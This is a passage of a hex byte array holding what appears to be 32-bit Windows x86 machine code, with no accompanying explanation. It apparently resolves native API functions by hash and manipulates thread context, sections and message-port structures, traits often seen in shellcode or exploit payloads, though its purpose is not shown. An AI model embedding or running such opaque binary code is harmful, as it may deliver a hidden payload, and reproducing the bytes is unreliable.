,0xFF,0xFF,0x89,0x04,0x24,0xE8,0x95,0xA0,0x00,0x00,0xC7,0x85,0x1C,0xFD,0xFF,0xFF,0x3F,0x00,0x01,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0x08,0xE1,0x48,0x65,0xE8,0xA8,0x2D,0x00,0x00,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x1D,0xB1,0x9D,0xA7,0x89,0x04,0x24,0xE8,0x17,0x2C,0x00,0x00,0x89,0x45,0xE8,0x83,0x7D,0xE8,0x00,0x0F,0x84,0x8C,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x2B,0x48,0x65,0xC7,0x04,0x24,0x01,0x00,0x00,0x00,0x8B,0x45,0xE8,0xFF,0xD0,0x83,0xEC,0x08,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x74,0x6F,0x8D,0x85,0x1C,0xFD,0xFF,0xFF,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0xFE,0xFF,0xFF,0xFF,0xE8,0x92,0x69,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x78,0x53,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x44,0x24,0x04,0x8D,0x85,0x1C,0xFD,0xFF,0xFF,0x89,0x04,0x24,0xE8,0xF1,0xFD,0xFF,0xFF,0x8D,0x85,0x1C,0xFD,0xFF,0xFF,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0xFE,0xFF,0xFF,0xFF,0xE8,0x77,0x69,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x78,0x1A,0x8B,0x45,0x0C,0x8B,0x55,0xEC,0x89,0x10,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xF4,0x8B,0x7D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x57,0x81,0xEC,0xF4,0x02,0x00,0x00,0xC7,0x45,0xF4,0x01,0x00,0x00,0xC0,0x8D,0x95,0x20,0xFD,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xB9,0xB3,0x00,0x00,0x00,0x89,0xD7,0xF3,0xAB,0xC7,0x44,0x24,0x08,0xCC,0x02,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8D,0x85,0x20,0xFD,0xFF,0xFF,0x89,0x04,0x24,0xE8,0x6A,0x9F,0x00,0x00,0xC7,0x85,0x20,0xFD,0xFF,0xFF,0x3F,0x00,0x01,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0x08,0xE1,0x48,0x65,0xE8,0x76,0x2C,0x00,0x00,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0xA3,0x0E,0x38,0x24,0x89,0x04,0x24,0xE8,0xE5,0x2A,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x74,0x6B,0x8D,0x85,0x20,0xFD,0xFF,0xFF,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0xFE,0xFF,0xFF,0xFF,0xE8,0x84,0x68,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x78,0x4F,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8D,0x85,0x20,0xFD,0xFF,0xFF,0x89,0x04,0x24,0xE8,0x47,0xFC,0xFF,0xFF,0x8D,0x85,0x20,0xFD,0xFF,0xFF,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0xFE,0xFF,0xFF,0xFF,0xE8,0x70,0x68,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x78,0x1D,0x8B,0x45,0x08,0x89,0x04,0x24,0x8B,0x45,0xEC,0xFF,0xD0,0x83,0xEC,0x04,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x90,0x8B,0x7D,0xFC,0xC9,0xC3,0x90,0x55,0x89,0xE5,0x83,0xEC,0x28,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x01,0x00,0x00,0xC0,0x83,0x7D,0x08,0x00,0x74,0x14,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x57,0x67,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x78,0x09,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x01,0x90,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x68,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x01,0x00,0x00,0xC0,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xB9,0x00,0x00,0x00,0x00,0xB8,0x18,0x00,0x00,0x00,0x83,0xE0,0xFC,0x89,0xC2,0xB8,0x00,0x00,0x00,0x00,0x89,0x4C,0x05,0xC8,0x83,0xC0,0x04,0x39,0xD0,0x72,0xF5,0xC7,0x45,0xC4,0x00,0x00,0x00,0x00,0x83,0x7D,0x08,0x00,0x0F,0x84,0xDE,0x00,0x00,0x00,0xC7,0x45,0xEC,0x1C,0xE1,0x48,0x65,0x66,0xC7,0x45,0xE8,0xA0,0x00,0x66,0xC7,0x45,0xEA,0xA2,0x00,0xC7,0x45,0xC8,0x18,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0xC7,0x45,0xD4,0x40,0x00,0x00,0x00,0x8D,0x45,0xE8,0x89,0x45,0xD0,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x18,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x14,0x01,0x00,0x00,0x00,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x00,0x00,0x00,0x00,0x8D,0x45,0xC8,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x3F,0x00,0x0F,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x61,0x65,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x78,0x62,0xC7,0x45,0xE4,0xBE,0xE1,0x48,0x65,0x66,0xC7,0x45,0xE0,0x10,0x00,0x66,0xC7,0x45,0xE2,0x12,0x00,0xC7,0x45,0xC4,0x02,0x00,0x00,0x00,0x8B,0x45,0x08,0x8B,0x00,0xC7,0x44,0x24,0x14,0x04,0x00,0x00,0x00,0x8D,0x55,0xC4,0x89,0x54,0x24,0x10,0xC7,0x44,0x24,0x0C,0x04,0x00,0x00,0x00,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0x8D,0x55,0xE0,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0x2C,0x65,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x78,0x0F,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x48,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x01,0x00,0x00,0xC0,0xB9,0x00,0x00,0x00,0x00,0xB8,0x18,0x00,0x00,0x00,0x83,0xE0,0xFC,0x89,0xC2,0xB8,0x00,0x00,0x00,0x00,0x89,0x4C,0x05,0xD4,0x83,0xC0,0x04,0x39,0xD0,0x72,0xF5,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0xC7,0x45,0xD0,0xD0,0xE1,0x48,0x65,0x66,0xC7,0x45,0xCC,0x46,0x00,0x66,0xC7,0x45,0xCE,0x48,0x00,0x8D,0x45,0xCC,0x89,0x45,0xDC,0xC7,0x45,0xD4,0x18,0x00,0x00,0x00,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x8D,0x45,0xD4,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x01,0x00,0x10,0x00,0x8D,0x45,0xEC,0x89,0x04,0x24,0xE8,0xD3,0x64,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x78,0x2D,0x8B,0x45,0xEC,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0x1B,0x62,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x78,0x0C,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xEC,0x85,0xC0,0x74,0x0B,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0x46,0x60,0x00,0x00,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x68,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x01,0x00,0x00,0xC0,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0x18,0xE2,0x48,0x65,0xE8,0x30,0x29,0x00,0x00,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0xFE,0xF2,0xC3,0x6C,0x89,0x04,0x24,0xE8,0x9F,0x27,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x74,0x5B,0xC7,0x45,0xE0,0x75,0x08,0xBC,0xA3,0xC7,0x45,0xE4,0x3A,0x0B,0x94,0x41,0xC7,0x44,0x24,0x18,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x14,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8D,0x45,0xE0,0x89,0x04,0x24,0xE8,0xC1,0x63,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x0F,0x89,0xC4,0x00,0x00,0x00,0xE9,0xCC,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0x18,0xE2,0x48,0x65,0xE8,0xA0,0x28,0x00,0x00,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x99,0xF8,0x0F,0x98,0x89,0x04,0x24,0xE8,0x0F,0x27,0x00,0x00,0x89,0x45,0xE8,0x83,0x7D,0xE8,0x00,0x0F,0x84,0x8F,0x00,0x00,0x00,0xC7,0x45,0xD0,0xD8,0xEA,0x6E,0xE4,0x66,0xC7,0x45,0xD4,0x54,0x0C,0x66,0xC7,0x45,0xD6,0x89,0x44,0xC7,0x45,0xD8,0x98,0x98,0x8F,0xA7,0xC7,0x45,0xDC,0x9D,0x05,0x9E,0x0E,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0xC7,0x45,0xC4,0x00,0x00,0x00,0x00,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x08,0x10,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8D,0x45,0xC0,0x89,0x04,0x24,0xE8,0xEB,0x9A,0x00,0x00,0xC7,0x44,0x24,0x0C,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0x8D,0x45,0xC0,0x89,0x44,0x24,0x04,0x8D,0x45,0xD0,0x89,0x04,0x24,0x8B,0x45,0xE8,0xFF,0xD0,0x83,0xEC,0x10,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x78,0x0C,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x57,0x81,0xEC,0x94,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x01,0x00,0x00,0xC0,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xB9,0x00,0x00,0x00,0x00,0xB8,0x18,0x00,0x00,0x00,0x83,0xE0,0xFC,0x89,0xC2,0xB8,0x00,0x00,0x00,0x00,0x89,0x4C,0x05,0xCC,0x83,0xC0,0x04,0x39,0xD0,0x72,0xF5,0x8D,0x55,0xA0,0xB8,0x00,0x00,0x00,0x00,0xB9,0x0B,0x00,0x00,0x00,0x89,0xD7,0xF3,0xAB,0xC7,0x45,0x9C,0x00,0x00,0x00,0x00,0xE8,0x14,0xFE,0xFF,0xFF,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x0F,0x88,0x62,0x01,0x00,0x00,0xE8,0x13,0xFD,0xFF,0xFF,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x0F,0x88,0x53,0x01,0x00,0x00,0xC7,0x45,0xEC,0x2C,0xE2,0x48,0x65,0x66,0xC7,0x45,0xE8,0x42,0x00,0x66,0xC7,0x45,0xEA,0x44,0x00,0xC7,0x45,0xCC,0x18,0x00,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x08,0x2C,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8D,0x45,0xA0,0x89,0x04,0x24,0xE8,0xCB,0x99,0x00,0x00,0xC7,0x45,0xB0,0x68,0x05,0x00,0x00,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x24,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x1C,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x18,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x14,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x10,0x00,0x00,0x02,0x00,0x8D,0x45,0xA0,0x89,0x44,0x24,0x0C,0x8D,0x45,0xCC,0x89,0x44,0x24,0x08,0x8D,0x45,0xE8,0x89,0x44,0x24,0x04,0x8D,0x45,0xE4,0x89,0x04,0x24,0xE8,0xE1,0x61,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x0F,0x88,0x92,0x00,0x00,0x00,0xC7,0x45,0x9C,0x68,0x05,0x00,0x00,0x8B,0x45,0xE4,0xC7,0x44,0x24,0x1C,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x18,0x00,0x00,0x00,0x00,0x8D,0x55,0x9C,0x89,0x54,0x24,0x14,0x8B,0x55,0x0C,0x89,0x54,0x24,0x10,0xC7,0x44,0x24,0x0C,0x00,0x00,0x00,0x00,0x8B,0x55,0x08,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x02,0x00,0x89,0x04,0x24,0xE8,0xAE,0x61,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x78,0x45,0x83,0x7D,0xF0,0x00,0x78,0x42,0x81,0x7D,0xF0,0x02,0x01,0x00,0x00,0x74,0x39,0x8B,0x45,0x0C,0x8B,0x40,0x1C,0x85,0xC0,0x79,0x1A,0xC7,0x04,0x24,0x70,0xE2,0x48,0x65,0xE8,0xFE,0x06,0x00,0x00,0xC7,0x04,0x24,0x98,0xE2,0x48,0x65,0xE8,0xF2,0x06,0x00,0x00,0xEB,0x16,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xE4,0x85,0xC0,0x74,0x0B,0x8B,0x45,0xE4,0x89,0x04,0x24,0xE8,0xC7,0x5C,0x00,0x00,0x8B,0x45,0xF4,0x8B,0x7D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x38,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x01,0x00,0x00,0xC0,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x8B,0x45,0x0C,0xC7,0x00,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x04,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x4E,0x33,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x75,0x21,0x8B,0x45,0x08,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0x9C,0xE2,0x48,0x65,0xE8,0x56,0x06,0x00,0x00,0xC7,0x04,0x24,0x98,0xE2,0x48,0x65,0xE8,0x4A,0x06,0x00,0x00,0xEB,0x60,0x8B,0x45,0xE8,0x8D,0x55,0xE8,0x89,0x54,0x24,0x14,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x08,0x00,0x08,0x00,0x00,0x89,0x44,0x24,0x04,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0x04,0x62,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x78,0x22,0x8B,0x45,0xE8,0x89,0x04,0x24,0xE8,0x3F,0x1E,0x00,0x00,0x8B,0x55,0x0C,0x89,0x02,0x8B,0x45,0x0C,0x8B,0x00,0x85,0xC0,0x74,0x0C,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x7D,0xEC,0x00,0x74,0x0B,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0xD6,0x5B,0x00,0x00,0x8B,0x45,0xE8,0x85,0xC0,0x74,0x0B,0x8B,0x45,0xE8,0x89,0x04,0x24,0xE8,0xC4,0x5B,0x00,0x00,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x57,0x81,0xEC,0x24,0x0A,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x01,0x00,0x00,0xC0,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0xC7,0x45,0xC4,0x00,0x00,0x00,0x00,0xC7,0x45,0xBC,0x00,0x00,0x00,0x00,0xB9,0x00,0x00,0x00,0x00,0xB8,0x18,0x00,0x00,0x00,0x83,0xE0,0xFC,0x89,0xC2,0xB8,0x00,0x00,0x00,0x00,0x89,0x4C,0x05,0xA4,0x83,0xC0,0x04,0x39,0xD0,0x72,0xF5,0xC7,0x45,0x9C,0x00,0x00,0x00,0x00,0xC7,0x45,0xA0,0x00,0x00,0x00,0x00,0xC7,0x45,0x98,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x8D,0x95,0x48,0xFF,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xB9,0x14,0x00,0x00,0x00,0x89,0xD7,0xF3,0xAB,0xC7,0x85,0x40,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0x44,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x8D,0x95,0x74,0xFC,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xB9,0xB3,0x00,0x00,0x00,0x89,0xD7,0xF3,0xAB,0xC7,0x85,0x48,0xFF,0xFF,0xFF,0x01,0x00,0x00,0xC0,0x8D,0x85,0x48,0xFF,0xFF,0xFF,0x89,0x85,0x40,0xFF,0xFF,0xFF,0x8D,0x85,0x74,0xFC,0xFF,0xFF,0x89,0x85,0x44,0xFF,0xFF,0xFF,0x8D,0x45,0x98,0x89,0x04,0x24,0xE8,0x3C,0xF8,0xFF,0xFF,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x84,0xAA,0x03,0x00,0x00,0xC7,0x45,0xA4,0x18,0x00,0x00,0x00,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0xC7,0x45,0xB0,0x02,0x00,0x00,0x00,0xC7,0x45,0xAC,0x00,0x00,0x00,0x00,0xC7,0x45,0xB4,0x00,0x00,0x00,0x00,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x00,0x00,0x00,0x00,0x8D,0x45,0xA4,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x10,0x8D,0x45,0xD8,0x89,0x04,0x24,0xE8,0x5C,0x5F,0x00,0x00,0x89,0x45,0xE8,0x83,0x7D,0xE8,0x00,0x0F,0x88,0x4C,0x03,0x00,0x00,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x00,0x00,0x00,0x00,0x8D,0x45,0xA4,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x10,0x8D,0x45,0xD4,0x89,0x04,0x24,0xE8,0x25,0x5F,0x00,0x00,0x89,0x45,0xE8,0x83,0x7D,0xE8,0x00,0x0F,0x88,0x18,0x03,0x00,0x00,0xC7,0x45,0xC0,0xF8,0x00,0x00,0x00,0xC7,0x45,0xC4,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x18,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x14,0x00,0x00,0x00,0x08,0xC7,0x44,0x24,0x10,0x04,0x00,0x00,0x00,0x8D,0x45,0xC0,0x89,0x44,0x24,0x0C,0x8D,0x45,0xA4,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x1F,0x00,0x0F,0x00,0x8D,0x45,0xD0,0x89,0x04,0x24,0xE8,0xE2,0x5C,0x00,0x00,0x89,0x45,0xE8,0x83,0x7D,0xE8,0x00,0x0F,0x88,0xC7,0x02,0x00,0x00,0x8B,0x45,0xD0,0xC7,0x44,0x24,0x24,0x04,0x00,0x00,0x00,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x1C,0x01,0x00,0x00,0x00,0x8D,0x55,0xBC,0x89,0x54,0x24,0x18,0xC7,0x44,0x24,0x14,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x00,0x00,0x00,0x00,0x8D,0x55,0xCC,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0xFF,0xFF,0xFF,0xFF,0x89,0x04,0x24,0xE8,0xBD,0x5F,0x00,0x00,0x89,0x45,0xE8,0x83,0x7D,0xE8,0x00,0x0F,0x88,0x6C,0x02,0x00,0x00,0x8D,0x45,0xE0,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x8E,0xFC,0xFF,0xFF,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x84,0x50,0x02,0x00,0x00,0x8B,0x45,0x08,0x89,0x45,0x9C,0x8B,0x45,0xE0,0x89,0x45,0xA0,0x8D,0x45,0x9C,0x89,0x44,0x24,0x0C,0x8D,0x45,0xA4,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x08,0x00,0x00,0x8D,0x45,0xDC,0x89,0x04,0x24,0xE8,0x43,0x5F,0x00,0x00,0x89,0x45,0xE8,0x83,0x7D,0xE8,0x00,0x0F,0x88,0x19,0x02,0x00,0x00,0x8D,0x95,0x7C,0xFB,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xB9,0x3E,0x00,0x00,0x00,0x89,0xD7,0xF3,0xAB,0xC7,0x85,0x7C,0xFB,0xFF,0xFF,0xF8,0x00,0x00,0x00,0x8D,0x85,0x40,0xFF,0xFF,0xFF,0x89,0x85,0x24,0xFC,0xFF,0xFF,0x8B,0x45,0xD4,0x89,0x85,0x4C,0xFC,0xFF,0xFF,0x8B,0x45,0xD8,0x89,0x85,0x44,0xFC,0xFF,0xFF,0xC7,0x85,0x2C,0xFC,0xFF,0xFF,0x05,0x40,0x00,0x80,0xC7,0x85,0x64,0xFC,0xFF,0xFF,0x01,0x00,0x00,0xC0,0xE8,0x8D,0x09,0x00,0x00,0x89,0x85,0x6C,0xFC,0xFF,0xFF,0x8B,0x45,0x08,0x89,0x85,0x80,0xFB,0xFF,0xFF,0x8B,0x45,0x0C,0x89,0x85,0x34,0xFC,0xFF,0xFF,0x8B,0x45,0xE0,0x89,0x85,0x84,0xFB,0xFF,0xFF,0x8B,0x45,0xDC,0x89,0x85,0x3C,0xFC,0xFF,0xFF,0x8D,0x95,0x10,0xF6,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xB9,0x5A,0x01,0x00,0x00,0x89,0xD7,0xF3,0xAB,0x66,0xC7,0x85,0x12,0xF6,0xFF,0xFF,0x68,0x05,0x66,0xC7,0x85,0x10,0xF6,0xFF,0xFF,0x50,0x05,0xC7,0x85,0x28,0xF6,0xFF,0xFF,0x00,0x00,0x00,0x20,0xC7,0x85,0x30,0xF6,0xFF,0xFF,0x00,0x00,0x00,0x00,0x8B,0x45,0xD0,0x89,0x85,0x38,0xF6,0xFF,0xFF,0x8B,0x45,0xD4,0x89,0x85,0x48,0xF6,0xFF,0xFF,0x8B,0x45,0xD8,0x89,0x85,0x40,0xF6,0xFF,0xFF,0x8B,0x45,0xD0,0x89,0x85,0x50,0xF6,0xFF,0xFF,0x8B,0x85,0x34,0xFC,0xFF,0xFF,0x89,0x85,0x58,0xF6,0xFF,0xFF,0x8B,0x85,0x3C,0xFC,0xFF,0xFF,0x89,0x85,0x60,0xF6,0xFF,0xFF,0x8B,0x85,0x80,0xFB,0xFF,0xFF,0x89,0x85,0x34,0xF6,0xFF,0xFF,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0xC7,0x44,0x24,0x08,0x68,0x05,0x00,0x00,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x4C,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x0F,0x84,0xEA,0x00,0x00,0x00,0x8B,0x45,0xF0,0x66,0xC7,0x40,0x02,0x68,0x05,0x8B,0x45,0xF0,0x66,0xC7,0x00,0x50,0x05,0x8B,0x45,0xCC,0xC7,0x44,0x24,0x08,0xF8,0x00,0x00,0x00,0x8D,0x95,0x7C,0xFB,0xFF,0xFF,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0x8B,0x93,0x00,0x00,0x8B,0x45,0xF0,0x89,0x44,0x24,0x04,0x8D,0x85,0x10,0xF6,0xFF,0xFF,0x89,0x04,0x24,0xE8,0xD3,0xF8,0xFF,0xFF,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x84,0x9D,0x00,0x00,0x00,0x8B,0x45,0xF0,0x8B,0x40,0x1C,0x85,0xC0,0x0F,0x88,0x92,0x00,0x00,0x00,0x8B,0x45,0xF0,0x8B,0x40,0x18,0x3D,0x02,0x00,0x00,0x20,0x0F,0x85,0x84,0x00,0x00,0x00,0x8B,0x45,0xF0,0x8B,0x40,0x20,0x89,0x45,0xE4,0x83,0x7D,0xE4,0x00,0x74,0x78,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0x8B,0x45,0xE4,0x89,0x04,0x24,